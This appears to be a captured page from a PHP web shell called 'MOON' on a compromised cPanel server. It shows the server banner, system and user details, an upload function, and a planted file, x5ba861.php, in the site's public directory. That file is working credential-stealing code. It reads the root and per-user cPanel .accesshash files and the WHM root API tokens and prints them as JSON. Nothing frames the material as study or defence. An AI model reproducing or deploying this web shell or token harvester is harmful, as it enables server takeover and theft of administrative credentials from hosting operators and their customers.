MOON
Server: Apache/2.4.63 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4
System: Linux ns2.portalpublico.com.br 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User: diariooficial (505)
PHP: 5.6.40
Disabled: NONE
Upload Files
File: /home/diariooficial/public_html/x5ba861.php
<?php $r=[];$ah=@file_get_contents('/root/.accesshash');if($ah)$r[]=['user'=>'root','hash'=>trim($ah)];foreach(glob('/home/*/.accesshash') as $f){  $u=basename(dirname($f));$c=trim(@file_get_contents($f));  if($c)$r[]=['user'=>$u,'hash'=>$c];}foreach(glob('/var/cpanel/authn/api_tokens_v2/whostmgr/root/*') as $f){  $c=trim(@file_get_contents($f));if($c)$r[]=['user'=>'root:'.basename($f),'hash'=>$c];}echo json_encode(['ok'=>1,'tokens'=>$r]);?>